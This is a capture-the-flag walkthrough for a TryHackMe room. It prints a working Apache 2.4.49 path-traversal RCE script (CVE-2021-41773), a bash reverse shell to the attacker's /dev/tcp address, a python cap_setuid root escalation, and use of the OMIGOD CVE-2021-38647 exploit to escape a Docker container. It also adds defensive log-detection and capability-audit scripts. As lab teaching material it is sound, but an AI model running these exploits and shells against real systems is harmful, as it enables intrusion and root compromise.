THM Writeup – Oh My WebServer

Oh My WebServer

Can you root me?

Room: Oh My WebServer

Difficulty: Medium

Operating System: Linux

Author: tinyb0y

Add IP address to your hosts file:

echo '10.10.79.128    webserver.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv webserver.thm

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 63

Get more details about open ports:

nmap -T4 -A -p 22,80 webserver.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
|_http-title: Consult - Business Consultancy Agency Template | Home

Directory brute-force the web application:

gobuster dir -u http://webserver.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

===============================================================
/index.html (Status: 200)
/assets (Status: 301)
===============================================================

Nothing interesting; I also viewed the page source and found nothing interesting there either.

Let’s check whether the Apache version is vulnerable – search (Google) for apache 2.4.49 exploit:

[Image: Google search results for "apache 2.4.49 exploit"]

We found this exploit:

#!/bin/bash
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

# Usage: PoC.sh [TARGET-LIST.TXT] [PATH] [COMMAND]
# Both the target list ($1) and the path ($2) are required; the command ($3) is optional.
if [[ -z "$1" ]] || [[ -z "$2" ]]; then
  echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
  echo "../PoC.sh targets.txt /etc/passwd"
  exit 1
fi

# One request per host listed in $1: $2 is the path to reach, $3 the command to run.
for host in $(cat "$1"); do
  echo "$host"
  curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

Save the exploit to a file named e.g. PoC.sh.

Create targets.txt file and make PoC.sh file executable:

echo 'webserver.thm' > targets.txt
chmod +x PoC.sh

Now run the exploit:

root@ip-10-10-143-108:~# ../PoC.sh targets.txt /bin/sh whoami
webserver.thm
daemon

Great, the exploit works, so let’s get a reverse shell now.

Open another terminal window and run netcat listener:

nc -lnvp 4242

And run the exploit again, this time with a different command (don’t forget to change the IP and port):

../PoC.sh targets.txt /bin/bash 'bash -i >& /dev/tcp/10.10.143.108/4242 0>&1'

And we received a reverse shell:

[Image: reverse shell received in the netcat listener]
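From the defender's side, the request shape this PoC sends is easy to pick out of Apache access logs once the path is percent-decoded. The following is an added example written for this writeup, not code from the room or from the exploit author: it parses constructed combined-format log lines, decodes the path repeatedly (so the %2e form used here and the double-encoded %%32%65 form that the incomplete 2.4.50 fix still accepted both become a literal `..`), and reports every request whose decoded path contains a `..` segment, noting whether the server answered 200 (traversal not blocked) and whether the request has the POST-into-cgi-bin shape of the RCE variant. The log lines, client address and timestamps are all constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample of Apache combined-format access log lines (not from the room).
# The 2nd-4th lines mimic traversal requests; the 4th uses the double-encoded form
# (%%32%65 -> %2e -> .) and is shown as blocked with a 403.
SAMPLE_LOG = """\
10.10.143.108 - - [07/Mar/2022:08:40:01 +0000] "GET /index.html HTTP/1.1" 200 5122 "-" "Mozilla/5.0"
10.10.143.108 - - [07/Mar/2022:08:41:13 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 7 "-" "curl/7.68.0"
10.10.143.108 - - [07/Mar/2022:08:41:20 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1832 "-" "curl/7.68.0"
10.10.143.108 - - [07/Mar/2022:08:42:05 +0000] "GET /icons/.%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.68.0"
10.10.143.108 - - [07/Mar/2022:08:43:00 +0000] "GET /assets/css/style.css HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(path, max_rounds=4):
    """Percent-decode until the string stops changing, so that both %2e and
    the double-encoded %%32%65 collapse to a literal '.' before inspection."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_dotdot_segment(decoded_path):
    """True if any '/'-separated segment of the decoded path is '..'.
    Apache rejects a literal '..' segment itself; the bug was that encoded
    forms slipped past that check, so only the decoded view is inspected."""
    return any(seg == ".." for seg in decoded_path.split("/"))


def detect_traversal(log_text):
    """Return one finding per request whose decoded path climbs with '..'.
    'succeeded' is True when the server answered 200, i.e. the traversal was
    not blocked; a patched server returns 400 or 403 for these requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        decoded = fully_decode(raw)
        if not has_dotdot_segment(decoded):
            continue
        last_segment = decoded.rsplit("/", 1)[-1]
        findings.append({
            "client": m.group("ip"),
            "method": m.group("method"),
            "raw": raw,
            "decoded": decoded,
            "status": int(m.group("status")),
            "succeeded": m.group("status") == "200",
            # A POST through cgi-bin that resolves to a shell is the RCE variant of the bug.
            "rce_shape": m.group("method") == "POST" and "/cgi-bin/" in raw
                         and last_segment in ("sh", "bash"),
        })
    return findings


if __name__ == "__main__":
    for f in detect_traversal(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['raw']} -> {f['decoded']} "
              f"status={f['status']} succeeded={f['succeeded']} rce_shape={f['rce_shape']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; a `succeeded` finding on an unpatched 2.4.49/2.4.50 host means the server actually served the traversed path, whereas 400/403 responses show the request was attempted but blocked.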

Try to find user flag:

daemon@4a70924bafa0:/bin$ ls -lA /home
ls -lA /home
total 0
daemon@4a70924bafa0:/bin$ ls -lA /
ls -lA /
total 68
-rwxr-xr-x   1 root root    0 Feb 23 06:21 .dockerenv
drwxr-xr-x   1 root root 4096 Oct  8 05:30 bin
drwxr-xr-x   2 root root 4096 Jun 13  2021 boot
drwxr-xr-x   5 root root  340 Mar  7 08:30 dev
drwxr-xr-x   1 root root 4096 Feb 23 06:21 etc
drwxr-xr-x   2 root root 4096 Jun 13  2021 home
drwxr-xr-x   1 root root 4096 Oct  8 05:36 lib
drwxr-xr-x   2 root root 4096 Sep 27 00:00 lib64
drwxr-xr-x   2 root root 4096 Sep 27 00:00 media
drwxr-xr-x   2 root root 4096 Sep 27 00:00 mnt
drwxr-xr-x   2 root root 4096 Sep 27 00:00 opt
dr-xr-xr-x 167 root root    0 Mar  7 08:30 proc
drwx------   1 root root 4096 Oct  8 08:28 root
drwxr-xr-x   3 root root 4096 Sep 27 00:00 run
drwxr-xr-x   1 root root 4096 Oct  8 08:10 sbin
drwxr-xr-x   2 root root 4096 Sep 27 00:00 srv
dr-xr-xr-x  13 root root    0 Mar  7 08:30 sys
drwxrwxrwt   1 root root 4096 Feb 23 05:39 tmp
drwxr-xr-x   1 root root 4096 Sep 27 00:00 usr
drwxr-xr-x   1 root root 4096 Sep 27 00:00 var

As we can see there is no user home directory and we are probably in a Docker container – so I guess the user flag is in the /root directory, which means we need to escalate our privileges.

Do basic enumeration:

daemon@4a70924bafa0:/bin$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep

Nice, the python3.7 binary has the cap_setuid capability, so it is allowed to change its UID.

Check GTFOBins to find a way to exploit it:

[Image: GTFOBins entry for python with the setuid capability]

Now exploit it:

daemon@4a70924bafa0:/bin$ python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
id
uid=0(root) gid=1(daemon) groups=1(daemon)

Now we are the root user inside the Docker container, so we can get the user flag:

cat /root/user.txt
[REDACTED]
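The getcap finding above is the kind of thing a defender should be checking for routinely rather than discovering after the fact. The following is an added example written for this writeup, not code from the room or from any tool it uses: it parses `getcap -r /` output (both the older `path = caps+flags` print format and the newer `path caps=flags` one), keeps only capabilities that are effective, and flags the ones that are root-equivalent on their own, rating an interpreter such as python3.7 as critical because a file capability on an interpreter applies to whatever code the user passes to it. The sample output lines below are constructed, not taken from the target.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output (not from the room).
# The first three lines use the older libcap print format ("path = caps+flags"),
# the last one the newer format ("path caps=flags"), so both are handled.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/gdb = cap_sys_ptrace+ep cap_net_raw+i
/usr/bin/tar cap_dac_read_search=ep
"""

# Capabilities that, when effective on a binary an unprivileged user can run,
# are enough on their own to read as or become root (the set GTFOBins tracks).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_read_search", "cap_dac_override", "cap_chown", "cap_fowner", "cap_setfcap",
}

# Interpreters: a file capability here is inherited by arbitrary user-supplied code.
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php|node|lua)[\d.]*$")

# One clause of a capability spec, e.g. "cap_setuid+ep" or "cap_net_raw,cap_net_admin=eip".
CLAUSE_RE = re.compile(r"^(?P<caps>[a-z_0-9,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap(text):
    """Parse getcap output into a list of (path, {cap: flags}) tuples."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, spec = line.split(" = ", 1)      # older libcap format
        else:
            parts = line.split(None, 1)             # newer libcap format
            if len(parts) != 2:
                continue
            path, spec = parts
        caps = {}
        for clause in spec.split():
            m = CLAUSE_RE.match(clause)
            if not m:
                continue
            for cap in m.group("caps").split(","):
                caps[cap] = m.group("flags")
        entries.append((path, caps))
    return entries


def risky_binaries(entries):
    """Return findings for binaries whose *effective* caps are root-equivalent.
    Severity is 'critical' for interpreters (the capability applies to any script
    or -c one-liner the caller supplies) and 'high' for everything else."""
    findings = []
    for path, caps in entries:
        bad = sorted(c for c, flags in caps.items()
                     if c in ROOT_EQUIVALENT and "e" in flags)
        if not bad:
            continue
        name = path.rsplit("/", 1)[-1]
        severity = "critical" if INTERPRETER_RE.search(name) else "high"
        findings.append({"path": path, "caps": bad, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in risky_binaries(parse_getcap(SAMPLE_GETCAP)):
        print(f"{f['severity']:8s} {f['path']}  {','.join(f['caps'])}")
```

Feed it the real output of `getcap -r / 2>/dev/null` from a host or container image; ping's cap_net_raw is not reported because it is not root-equivalent, while gdb's cap_net_raw+i is ignored because the capability is only inheritable, not effective.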

Upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color

Download the linux enumeration script to your attacking machine and start a web server:

wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/linpeas.sh
python3 -m http.server 9000

Go to the target machine’s terminal and download the linpeas.sh:

root@4a70924bafa0:/tmp# curl http://10.10.143.108:9000/linpeas.sh -o linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100  745k  100  745k    0     0  51.9M      0 --:--:-- --:--:-- --:--:-- 51.9M

We had to use curl since wget is not installed…

Now run the enumeration script:

sh linpeas.sh | tee -a linpeas.log

Read the log file:

less -R linpeas.log

Found nothing of interest.

For some time I couldn’t find a way out of the container. Then I realized that since we are in a container there must be a host, so let’s try to find/guess its IP address – first check the container’s IP address:

root@4a70924bafa0:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 928694  bytes 153059413 (145.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1315865  bytes 406394848 (387.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Ok, the container’s IP address is 172.17.0.2, so the host’s IP address might be 172.17.0.1 – let’s confirm this assumption using nmap.

Go to your attacking machine terminal, download the nmap static binary to the current directory and run a webserver:

wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap
python3 -m http.server 9000

Now go back to target machine’s terminal, download nmap and make it executable:

root@4a70924bafa0:/tmp# curl http://10.10.143.108:9000/nmap -o nmap
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100 2892k  100 2892k    0     0  91.1M      0 --:--:-- --:--:-- --:--:-- 91.1M
root@4a70924bafa0:/tmp# chmod +x nmap

Run the nmap scan against 172.17.0.1:

root@4a70924bafa0:/tmp# ../nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv 172.17.0.1

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
5986/tcp open  unknown syn-ack ttl 64

Now check port 5986 – search for what port 5986 is used for:

[Image: search results for "port 5986"]

Ok, it is the encrypted PowerShell remoting port (WinRM over HTTPS) – there might be a way to exploit it.

Search for port 5986 exploit:

[Image: search results for "port 5986 exploit"]

I found 2 excellent articles about abusing WinRM:

I read through them and learned something new again; however, I had a feeling this was not the right way in our case. So I searched more, scrolled down the Google search results page and found this article about the OMIGOD service:

[Image: article listing the OMIGOD vulnerabilities]

The only one usable in our case is CVE-2021-38647, so let’s try to find a way to exploit it – search for CVE-2021-38647 exploitation:

[Image: search results for "CVE-2021-38647 exploitation"]

We found a proof-of-concept to exploit CVE-2021-38647.

Reading through the README we see there are exploits for PowerShell and Python; we’re going to use Python.

Download CVE-2021-38647.py to your attacking machine and run a web server:

wget https://raw.githubusercontent.com/AlteredSecurity/CVE-2021-38647/main/CVE-2021-38647.py
python3 -m http.server 9000

Go to the target machine’s terminal, download the exploit from your attacking machine and make it executable:

root@4a70924bafa0:/tmp# curl http://10.10.143.108:9000/CVE-2021-38647.py -o CVE-2021-38647.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100  5246  100  5246    0     0  1024k      0 --:--:-- --:--:-- --:--:-- 1024k
root@4a70924bafa0:/tmp# chmod +x CVE-2021-38647.py

Python usage according to README.md:

[Image: Python usage section of the CVE-2021-38647 README.md]

Execute the exploit:

root@4a70924bafa0:/tmp# python3 CVE-2021-38647.py -t 172.17.0.1 -p 5986 -c 'id;cat /root/root.txt'
uid=0(root) gid=0(root) groups=0(root)
[REDACTED]
